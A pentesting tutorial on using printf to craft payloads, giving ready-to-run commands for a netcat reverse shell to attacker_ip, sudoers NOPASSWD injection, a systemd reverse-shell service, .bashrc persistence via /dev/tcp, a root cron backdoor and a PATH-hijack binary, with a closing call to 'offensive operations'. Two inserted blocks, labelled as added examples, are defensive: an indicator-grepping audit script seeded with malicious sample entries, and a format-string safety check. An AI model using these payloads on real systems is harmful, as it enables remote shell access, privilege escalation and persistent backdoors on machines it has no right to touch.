printf for Payloads:
When it comes to crafting precise payloads or writing malicious scripts on-the-fly, one tool stands above echo in both control and reliability — the mighty printf. It’s clean, it’s predictable, and it doesn’t flinch at escape characters or strange input. As pentesters, we often find ourselves needing to generate scripts, inject payloads, or build files that execute exactly what we intend. This is where printf shines.
Why Use printf Over echo
echo can be quirky. It’s inconsistent between shells, often mishandles escape characters like \n, and doesn’t give you control over formatting. printf behaves the same across the board — making it ideal for precision payload creation.
Example:

```bash
echo "line1\nline2"
# Output: line1\nline2   ← not what you wanted
printf "line1\nline2"
# Output:
# line1
# line2
```
Payload Crafting with printf
Let’s walk through some practical and commonly used scenarios where printf becomes a core weapon during exploitation and privilege escalation.
1. Creating Malicious Shell Scripts
```bash
printf '#!/bin/bash\nnc -e /bin/bash attacker_ip 4444\n' > /tmp/rev.sh
chmod +x /tmp/rev.sh
```
This drops a simple reverse shell script into /tmp. You can then execute it manually or abuse a misconfigured cronjob to trigger it.
2. Modifying sudoers (Privilege Escalation)
If you can get a script executed as root, use printf to inject yourself into /etc/sudoers:
```bash
printf '#!/bin/bash\necho "student ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers\n' > /opt/escalate.sh
chmod +x /opt/escalate.sh
```
Now, executing /opt/escalate.sh as root gives your user full sudo rights with no password prompt.
3. Systemd Service Dropper
```bash
printf "[Unit]\nDescription=Reverse Shell\n\n[Service]\nExecStart=/bin/bash -c 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1'\n\n[Install]\nWantedBy=multi-user.target\n" > /etc/systemd/system/pwn.service
```
If you can write to /etc/systemd/system, this drops a malicious service that opens a reverse shell when started.
4. Injecting Into .bashrc for Persistence
```bash
printf '\n/bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1\n' >> ~/.bashrc
```
This appends a reverse shell that triggers every time the user spawns a shell.
5. Creating Cronjob Payloads
```bash
printf '* * * * * root /tmp/rev.sh\n' > /etc/cron.d/rootbackdoor
```
If /etc/cron.d is writable, cron picks up this file and runs /tmp/rev.sh as root every minute.
6. Binary Hijack Payload Script
If you discover a PATH hijack vulnerability (e.g., root runs backup from an untrusted location), use printf to craft the fake binary:
```bash
printf '#!/bin/bash\n/bin/bash\n' > /tmp/backup
chmod +x /tmp/backup
```
Drop it into a writable PATH directory and wait for execution.
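The flip side of the six droppers above is that each one leaves a recognisable line in a well-known location: a cron.d entry pointing at a script in /tmp, a unit file or .bashrc line containing /dev/tcp/, a NOPASSWD:ALL rule in sudoers, and a world-writable directory on PATH. The following audit script is an added example, not code from the original post; it greps those locations for exactly the indicators the article's own payloads contain, and the function names, the constructed sample tree built by make_sample_tree, and the documentation address 203.0.113.5 are all assumptions made for the example.

```shell
#!/bin/sh
# Added audit script (not from the original post): a defender-side check that
# walks the persistence locations the article's six payloads target and reports
# lines matching the indicators those payloads leave behind. The sample tree
# built by make_sample_tree is constructed for this example; 203.0.113.5 is a
# documentation address, not a real host.

# Indicators drawn from the article's own payload strings (grep -E syntax).
INDICATORS='/dev/tcp/|nc -e |NOPASSWD:ALL|/tmp/[^ ]*\.sh'

# scan_file FILE: print "FILE:LINENO:LINE" for each matching line. Unreadable
# or missing files are skipped silently so the caller can pass globs.
scan_file() {
    f="$1"
    [ -r "$f" ] || return 0
    grep -nE "$INDICATORS" "$f" | while IFS= read -r hit; do
        printf '%s:%s\n' "$f" "$hit"
    done
}

# audit_tree ROOT: scan cron.d, systemd units, sudoers and every user's .bashrc
# under ROOT. ROOT is "/" on a live host or the mount point of a disk image.
audit_tree() {
    root="${1%/}"
    for f in "$root"/etc/cron.d/* "$root"/etc/systemd/system/*.service \
             "$root"/etc/sudoers "$root"/home/*/.bashrc; do
        scan_file "$f"
    done
}

# world_writable_path_dirs PATHSTRING: print each existing directory in the
# colon-separated PATHSTRING whose "others" write bit is set, i.e. the
# precondition for the fake-binary drop in section 6. Uses ls -ld rather than
# stat so it works on both GNU and BSD userlands.
world_writable_path_dirs() {
    oldifs=$IFS
    IFS=:
    set -f
    for d in $1; do
        [ -d "$d" ] || continue
        case $(ls -ld "$d") in
            ????????w*) printf '%s\n' "$d" ;;
        esac
    done
    set +f
    IFS=$oldifs
}

# make_sample_tree DIR: build a constructed filesystem under DIR containing one
# benign and one suspicious entry per location (example data only).
make_sample_tree() {
    t="$1"
    mkdir -p "$t/etc/cron.d" "$t/etc/systemd/system" "$t/home/student" "$t/bin" "$t/tmp"
    printf '0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf\n' > "$t/etc/cron.d/logrotate"
    printf '* * * * * root /tmp/rev.sh\n' > "$t/etc/cron.d/rootbackdoor"
    printf '[Unit]\nDescription=Reverse Shell\n\n[Service]\nExecStart=/bin/bash -c "bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"\n' \
        > "$t/etc/systemd/system/pwn.service"
    printf 'root ALL=(ALL:ALL) ALL\nstudent ALL=(ALL) NOPASSWD:ALL\n' > "$t/etc/sudoers"
    printf 'alias ll="ls -l"\n/bin/bash -i >& /dev/tcp/203.0.113.5/4444 0>&1\n' > "$t/home/student/.bashrc"
    chmod 1777 "$t/tmp"
    chmod 755 "$t/bin"
}

# Usage: sh audit.sh /            (live host)
#        sh audit.sh /mnt/image   (mounted disk image)
if [ "$#" -gt 0 ]; then
    audit_tree "$1"
    world_writable_path_dirs "$PATH"
fi
```

Run against the constructed tree, audit_tree reports four lines (the rootbackdoor cron entry, the pwn.service ExecStart line, the NOPASSWD sudoers rule and the .bashrc reverse shell) and nothing from the benign logrotate entry; world_writable_path_dirs flags only the 1777 directory. The indicator list is deliberately narrow so that every hit is traceable to one of the article's payloads; widen it to taste for your own environment.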
Useful Formatting in Payloads
\n – newline
\t – tab
%s – string format
%d – integer format
%x – hex format
You can combine these for fine control:
```bash
printf "Username:\t%s\nPassword:\t%s\n" "$USER" "hunter2"
```
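Two points from this page are worth checking rather than taking on faith: that printf's escape handling is the same under every shell while echo's is not, and that the format argument is interpreted, so anything of unknown origin must be passed as a %s argument and never spliced into the format itself (otherwise a stray % in the data silently changes the output). The script below is an added example, not code from the original post; it assumes a POSIX sh is on PATH as "sh", and the function names are invented for the example.

```shell
#!/bin/sh
# Added example (not from the original post): makes the echo-vs-printf claim
# and the format-string caveat checkable instead of anecdotal.

# count_lines_echo SHELL: how many lines `echo "a\nb"` produces under the given
# shell binary. bash prints 1 (the \n is kept literally), dash prints 2 (the
# \n is expanded) -- the inconsistency the article describes.
count_lines_echo() {
    n=$("$1" -c 'echo "a\nb"' | wc -l)
    echo $((n))
}

# count_lines_printf SHELL: printf expands \n in its format under any POSIX
# shell, so this is 2 everywhere.
count_lines_printf() {
    n=$("$1" -c 'printf "a\nb\n"' | wc -l)
    echo $((n))
}

# render_unsafe DATA: DATA is used as the format string, so any % or backslash
# sequence inside it is interpreted. This is the bug pattern to avoid.
render_unsafe() {
    printf "$1"
}

# render_safe DATA: fixed format, DATA passed as an argument, printed verbatim.
render_safe() {
    printf '%s' "$1"
}

# format_report USER SECRETLEN ID: the article's combined-format idea
# (\t, %s, %d, %x) with every variable supplied as an argument rather than
# spliced into the format. Shows the length of a secret, not the secret.
format_report() {
    printf 'Username:\t%s\nPassword length:\t%d\nHex id:\t%x\n' "$1" "$2" "$3"
}

# Usage: sh printf_check.sh
if [ "$#" -eq 0 ] && [ "${0##*/}" = "printf_check.sh" ]; then
    echo "echo lines under sh:   $(count_lines_echo sh)"
    echo "printf lines under sh: $(count_lines_printf sh)"
    echo "unsafe render of '%s': [$(render_unsafe '%s')]"
    echo "safe render of '%s':   [$(render_safe '%s')]"
    format_report alice 7 255
fi
```

render_unsafe '%s' prints nothing, because the data was treated as a conversion with no argument; render_safe prints the literal %s. That difference is the whole reason the fixed-format idiom exists, and it applies equally when the data comes from a filename, an environment variable or a line read from a socket.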
Final Thoughts
printf is an essential payload construction tool. It’s the stealth scalpel compared to the sledgehammer that is echo. Whether you’re creating a reverse shell, manipulating system files, or dropping persistence, printf gives you clean, controlled execution every time.
If you’re serious about offensive operations — drop the echo and printf like a pro.
